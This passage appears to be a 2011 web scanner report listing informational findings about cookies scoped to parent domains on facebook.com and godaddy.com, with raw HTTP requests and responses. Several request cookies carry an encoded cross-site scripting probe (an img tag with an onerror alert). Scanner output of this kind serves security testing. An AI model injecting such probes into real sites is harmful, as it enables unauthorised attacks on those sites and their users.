"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.90. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.32.111
Connection: close
Date: Thu, 05 May 2011 10:56:48 GMT
Content-Length: 10419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.91. http://www.facebook.com/skdarealist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/skdarealist

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /skdarealist HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fskdarealist; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.81
Connection: close
Date: Thu, 05 May 2011 11:42:27 GMT
Content-Length: 115848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.92. http://www.facebook.com/sportingnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sportingnews

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sportingnews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.93. http://www.facebook.com/stefanoboscolomarchi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/stefanoboscolomarchi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stefanoboscolomarchi HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fstefanoboscolomarchi; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.47
Connection: close
Date: Thu, 05 May 2011 11:42:33 GMT
Content-Length: 145632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.94. http://www.facebook.com/techcrunch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/techcrunch

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /techcrunch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

10.95. http://www.facebook.com/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/terms.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

10.96. http://www.facebook.com/theteebers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/theteebers

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /theteebers HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftheteebers; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.23
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 67960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.97. http://www.facebook.com/wmoppert previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/wmoppert

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wmoppert HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fwmoppert; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.45
Connection: close
Date: Thu, 05 May 2011 11:42:10 GMT
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.98. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.99. https://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.100. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lsd=bnJmV; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=bnJmV; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.166.47
X-Cnection: close
Date: Thu, 05 May 2011 12:37:53 GMT
Content-Length: 14457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.101. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.102. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.103. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/help/contact.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.104. https://www.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lsd=Mkkns; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.106. https://www.facebook.com/pages/create.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.107. https://www.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10.108. https://www.facebook.com/recover.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/recover.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
made_write_conn=1304595854; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
W=1304595854; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.109. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.110. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
